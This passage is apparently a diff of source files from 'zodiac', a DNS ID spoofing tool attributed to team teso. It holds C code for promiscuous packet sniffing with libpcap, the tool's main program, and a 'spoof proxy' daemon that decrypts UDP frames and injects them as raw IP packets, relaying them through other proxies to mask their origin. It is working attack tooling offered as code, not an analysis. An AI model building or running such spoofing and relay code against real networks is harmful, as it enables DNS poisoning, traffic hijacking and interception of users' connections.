return (1);
}
return (0);
}
/* sniff_open
*
* open `dev' for sniffing, or just the first sniffable one, if
* dev is NULL.
*
* return NULL on failure
* return pointer sniffing device structure on success
* -smiler
* Added link layer header length detection.
*/
s_dev *
sniff_open (char *devname)
{
int n; /* temporary return value */
s_dev *device; /* sniffing device structure to create */
char errorbuf[PCAP_ERRBUF_SIZE]; /* error buffer for pcap message */
/* create new sniffing device structure in s_dev
*/
device = xcalloc (1, sizeof (s_dev));
/* check wether to use the first device or a specified device
*/
if (devname == NULL) {
/* due to lame pcap manpage, you should not know that it's static *doh* */
device->interface = pcap_lookupdev (errorbuf);
if (device->interface == NULL) {
m_printf (ms, ms->winproc, "[zod] sniff_open (pcap_lookupdev): %s\n", errorbuf);
device->error = 1;
return (device);
}
} else {
/* if the interface we have to use is already known just copy it
*/
device->interface = xstrdup (devname);
}
/* try to open the device found
*/
device->pd = sniff_pcap_open (device->interface);
if (device->pd == NULL) {
device->error = 1;
return (device);
}
/* now query some information about the device and store them into our struct
*/
n = pcap_lookupnet (device->interface, &device->localnet,
&device->netmask, errorbuf);
if (n == -1) {
device->error = 1;
return (device);
}
device->linktype = pcap_datalink (device->pd);
if (device->linktype == -1) {
device->error = 1;
return (device);
}
switch (device->linktype) {
/* not sure about all of these, but they work for me :\ */
case DLT_SLIP:
case DLT_PPP:
case DLT_NULL:
device->linkhdrlen = 4;
break;
case DLT_RAW:
device->linkhdrlen = 0;
break;
case DLT_EN10MB:
default:
device->linkhdrlen = 14;
break;
}
m_printf(ms, ms->winproc, "[zod] sniff_open - linkhdrlen = %d\n",device->linkhdrlen);
return (device);
}
/* sniff_pcap_open
*
* securely wraps the pcap_open_live call to catch any errors
*
* return NULL on failure
* return capture descriptor on succes
*/
pcap_t *
sniff_pcap_open (char *device)
{
char errorbuf[PCAP_ERRBUF_SIZE]; /* error buffer */
pcap_t *pdes = NULL; /* packet capture descriptor */
pdes = pcap_open_live (device, SNAPLEN, PROMISC, READ_TIMEOUT, errorbuf);
if (pdes == NULL) {
m_printf (ms, ms->winproc, "[zod] sniff_pcap_open (pcap_open_live): %s\n", errorbuf);
return (NULL);
}
return (pdes);
}
/* sniff_dev_free
*
* close and free a sniffing device
*/
void
sniff_dev_free (s_dev *device)
{
pcap_close (device->pd);
if (device->interface)
free (device->interface);
free (device);
return;
}
/* sniff_dev_ip
*
* get the ip given the name of a device.
* i /hope/ this is portable ;)
* -smiler 991001
*
* return 0 on success
* return -1 on failure
*/
int
sniff_dev_ip (const char *dev, struct in_addr *ip)
{
int ifsock,
i_cnt;
struct ifconf ifc;
struct ifreq *ifr;
char buf[1024];
ifsock = socket (AF_INET, SOCK_DGRAM, 0);
if (ifsock < 0)
return (-1);
ifc.ifc_len = sizeof (buf);
ifc.ifc_buf = buf;
if (ioctl (ifsock, SIOCGIFCONF, &ifc) < 0)
return (-1);
i_cnt = ifc.ifc_len / sizeof(struct ifreq);
for (ifr = ifc.ifc_req; i_cnt ; i_cnt--, ifr++) {
if (strcmp (dev, ifr->ifr_name) == 0) {
memcpy (ip, &((struct sockaddr_in *) &ifr->ifr_addr)->sin_addr,
sizeof (struct in_addr));
return (0);
}
}
return (-1);
}

45
dns/zodiac/src/sniff.h Normal file
View file

@ -0,0 +1,45 @@
/* snifflib
*
* by scut
*
*/
#ifndef Z_SNIFF_H
#define Z_SNIFF_H
#include <pcap.h>
#include "packet.h"
#define SNAPLEN 65535
#define PROMISC 1
#define READ_TIMEOUT 0
typedef struct s_dev {
int error; /* error flag */
pcap_t *pd; /* packet capture descriptor */
char *interface; /* interface name */
int linktype; /* link layer type */
unsigned long int linkhdrlen; /* length of the link layer frame header */
bpf_u_int32 localnet; /* local network address */
bpf_u_int32 netmask; /* netmask of local network */
} s_dev;
typedef struct sniff_info {
s_dev *device; /* device structure of the sniffing device */
pq_thread *pq_thd; /* packet queue list root pointer */
} sniff_info;
int sniff_new (pthread_t *tid, char *interface, pq_thread *pq_thd);
void *sniff_handle (sniff_info *sinfo);
s_dev *sniff_open (char *devname);
pcap_t *sniff_pcap_open (char *device);
void sniff_dev_free (s_dev *device);
int sniff_dev_ip (const char *dev, struct in_addr *ip);
#endif

113
dns/zodiac/src/zodiac.c Normal file
View file

@ -0,0 +1,113 @@
/* zodiac - advanced dns id spoofer
*
* by team teso
*
*
*/
#define ZODIAC_MAIN
#include <unistd.h>
#include <pthread.h>
#include <semaphore.h>
#include <time.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <ncurses.h>
#include "common.h"
#include "dns.h"
#include "dns-spoof.h"
#include "dns-tools.h"
#include "gui.h"
#include "output.h"
#include "packet.h"
#include "sniff.h"
int quiteness = 0;
char * zodiac_spoof_proxy = NULL;
char * zodiac_spoof_proxy_key = NULL;
unsigned short int zodiac_spoof_proxy_port = 0;
mscr * ms; /* global screen variable */
char * match_hash =
"\xe7\x30\xbb\x0b\xda\x73\xdf\x98\xf6\x38\xac\x9f\xa3\xcc\xc0\x8f";
static void usage (char *program);
static void
usage (char *program)
{
printf ("usage: %s [options]\n\n"
"options\n"
" -h this help *wow* :-)\n"
" -i <dev> use <dev> device for sniffing\n"
" -q quiet operation\n\n", program);
exit (EXIT_FAILURE);
}
int
main (int argc, char **argv)
{
char c;
pq_thread *pmain;
pthread_t sniff_t;
char *interface = "eth0";
if (argc >= 5) {
usage (argv[0]);
}
while ((c = getopt (argc, argv, "qhi:")) != EOF) {
switch (c) {
case 'h':
usage (argv[0]);
break;
case 'i':
interface = optarg;
break;
case 'q':
quiteness++;
break;
default:
exit (EXIT_FAILURE);
}
}
srandom (time (NULL));
ms = out_init ();
if (ms == NULL) {
fprintf (stderr, "[zod] cannot initialize console\n");
exit (EXIT_FAILURE);
}
/* install a sniffing handler
*/
pmain = pq_create ();
if (pmain == NULL) {
m_printf (ms, ms->winproc, "[zod] failed to create packetizer thread\n");
endwin ();
exit (EXIT_FAILURE);
}
if (sniff_new (&sniff_t, interface, pmain)) {
m_printf (ms, ms->winproc, "[zod] failed to create new sniffing thread\n");
endwin ();
exit (EXIT_FAILURE);
}
m_printf (ms, ms->winproc, "[zod] zodiac successfully started\n");
libnet_seed_prand ();
menu_handle ();
endwin ();
exit (EXIT_SUCCESS);
}

23
dns/zodiac/src/zodiac.h Normal file
View file

@ -0,0 +1,23 @@
/* zodiac - advanced dns spoofer
*
* by scut / teso
*/
#include "output.h"
#ifndef Z_ZODIAC_H
#define Z_ZODIAC_H
#define AUTHORS "team teso"
#define VERSION "v0.4.9"
#ifndef ZODIAC_MAIN
extern mscr * ms; /* global screen variable */
extern char * zodiac_spoof_proxy;
extern char * zodiac_spoof_proxy_key;
extern unsigned short int zodiac_spoof_proxy_port;
#endif
#endif

View file

@ -0,0 +1,18 @@
CFLAGS=-Wall -g -ggdb -DDEBUG `libnet-config --defines` -D_REENTRANT
LIBS=-lnet
CC=gcc
OBJS = ../common.o ../io-udp.o ../cipher-blowfish.o ../cipher-sha1.o ../network.o
PREFIX=/usr/local
all: zsp zsp-test
clean:
rm -f *.o zsp zsp-test
zsp: zsp.c $(OBJS)
$(CC) $(CFLAGS) -o zsp zsp.c $(OBJS) $(LIBS)
mv zsp ../../
zsp-test: zsp-test.c $(OBJS)
$(CC) $(CFLAGS) -o zsp-test zsp-test.c $(OBJS) $(LIBS)

View file

@ -0,0 +1,27 @@
/* zodiac spoof proxy
*
* by team teso
*
* test program
*/
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include "../io-udp.h"
#include "../network.h"
int
main (int argc, char **argv)
{
unsigned char *data =
"\xe7\x30\xbb\x0b\xda\x73\xdf\x98\xf6\x38\xac\x9f\xa3\xcc\xc0\x8f"
"dabadiduthisisatestforthezodiacspoofproxywhichisalmightyyoushouldknow:-)";
udp_send (NULL, 0, "127.0.0.1", 17852, "foobar", data, strlen (data));
exit (EXIT_SUCCESS);
}

234
dns/zodiac/src/zsp/zsp.c Normal file
View file

@ -0,0 +1,234 @@
/* zodiac spoof proxy
*
* by team teso
*
* main program
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <libnet.h>
#include "../io-udp.h"
#include "../network.h"
#define VERSION "0.0.3"
#define AUTHORS "team teso"
/* nah, no snakeoil here, this is just a packet marker (straight from
* /dev/random), which is used to avoid bouncing of messed up packets.
* you usually don't have to modify it. tho if you do it, modify the
* one in ./src/dns-build.c too to match this one. :-)
* -sc
*/
char match_hash[] =
"\xe7\x30\xbb\x0b\xda\x73\xdf\x98\xf6\x38\xac\x9f\xa3\xcc\xc0\x8f";
char *relay_ip = NULL;
unsigned short int relay_port = 0;
int relay_encrypt = 0;
unsigned char relay_key[32];
int key_read (char *key, size_t keylen, char *text);
void usage (void);
void zsp_process (udp_rcv *packet);
int
main (int argc, char **argv)
{
pid_t pid;
int daemon = 0;
char c; /* option character */
unsigned short int port = 17852; /* listening port */
char *ip = NULL; /* local ip to bind to */
udp_listen *listener;
udp_rcv *packet;
char key[32];
printf ("zodiac spoof proxy v" VERSION " by " AUTHORS "\n\n");
while ((c = getopt (argc, argv, "di:r:xp:h")) != EOF) {
switch (c) {
case 'd':
daemon = 1;
break;
case 'i':
ip = optarg;
break;
case 'r':
if (net_parseip (optarg, &relay_ip, &relay_port) != 1) {
fprintf (stderr, "failed to parse ip:port string %s\n", optarg);
exit (EXIT_FAILURE);
}
break;
case 'x':
relay_encrypt = 1;
break;
case 'p':
port = atoi (optarg);
break;
case 'h':
usage ();
break;
default:
fprintf (stderr, "invalid option: %c\n", c);
usage ();
break;
}
}
if (port == 0 || (relay_ip == NULL && relay_encrypt == 1))
usage ();
if (key_read (key, sizeof (key), "enter incoming encryption key: ") == 0 ||
(relay_encrypt == 1 &&
key_read (relay_key, sizeof (relay_key), "enter outgoing encryption key: ") == 0))
{
fprintf (stderr, "failed to read required keys... aborting.\n");
exit (EXIT_FAILURE);
}
printf ("\n");
if (daemon == 1) {
printf ("going daemon...\n");
pid = fork ();
if (pid == -1)
exit (EXIT_FAILURE);
else if (pid != 0)
exit (EXIT_SUCCESS);
printf ("daemon (pid: %d)\n", getpid ());
}
listener = udp_setup (ip, port);
if (listener == NULL) {
perror ("failed to aquire udp listener");
exit (EXIT_FAILURE);
}
while (1) {
packet = udp_receive (listener);
if (packet == NULL) {
fprintf (stderr, "udp_receive: NULL packet\n");
exit (EXIT_FAILURE);
}
if (packet->udp_len >= (16 + IP_H + UDP_H)) {
packet = udp_decipher (packet, key);
if (memcmp (packet->udp_data, match_hash, 16) == 0) {
zsp_process (packet);
} else {
fprintf (stderr, "!ERROR! received invalid packet, failed at decryption\n");
}
} else {
fprintf (stderr, "!ERROR! received packet size is too short (%d), skipping\n",
packet->udp_len);
}
udp_rcv_free (packet);
}
}
int
key_read (char *key, size_t keylen, char *text)
{
char r_str[16];
memset (key, '\x00', keylen);
printf ("%s", text); /* avoid wuftpd like misusage here haha :-) -sc */
fflush (stdout);
memset (r_str, '\x00', sizeof (r_str));
sprintf (r_str, "%%%ds", keylen - 1);
if (scanf (r_str, key) != 1)
return (0);
while (isspace (key[strlen (key)]))
key[strlen (key)] = '\x00';
return (1);
}
void
zsp_process (udp_rcv *packet)
{
int sock; /* raw socket, yeah :) */
int n; /* temporary return value */
socklen_t pkt_len = packet->udp_len - 16;
/* see whether we just have to relay the frame to another spoof proxy
*/
if (relay_ip != NULL) {
char *key = NULL;
if (relay_encrypt == 1)
key = relay_key;
udp_write (relay_ip, relay_port, packet->udp_data,
packet->udp_len, key);
printf ("[pkt] relayed %5d bytes (%d+16) from %s to zsp\n", packet->udp_len,
pkt_len, inet_ntoa (packet->addr_client.sin_addr));
return;
}
sock = libnet_open_raw_sock (IPPROTO_RAW);
if (sock == -1) {
fprintf (stderr, "!ERROR! failed to aquire raw socket, aborting\n");
exit (EXIT_FAILURE);
}
/* kick the packet hard
*/
n = libnet_write_ip (sock, packet->udp_data + 16,
pkt_len);
close (sock);
if (n < pkt_len) {
fprintf (stderr, "!ERROR! send too less bytes (%d/%d) in packet\n",
n, pkt_len);
} else {
printf ("[pkt] relayed %5d bytes from %s\n", pkt_len,
inet_ntoa (packet->addr_client.sin_addr));
}
return;
}
void
usage (void)
{
printf ("usage: zsp [-i <local listen ip>] [-r <ip>:<port>[ -x]] [-p <port>] [-d]\n\n"
"-i specifies the local ip to bind to\n"
"-r relay to another zodiac spoof proxy\n"
"-x reencrypt received frames before sending (2nd key will be asked)\n"
"-p specifies the local port to take packets from (default: 17852)\n"
"-d sets the program into daemon mode\n\n");
exit (EXIT_FAILURE);
return;
}